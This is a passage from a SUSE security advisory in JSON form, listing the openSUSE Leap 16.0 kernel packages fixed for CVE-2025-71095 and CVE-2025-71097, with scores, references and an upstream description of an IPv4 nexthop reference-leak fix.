"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
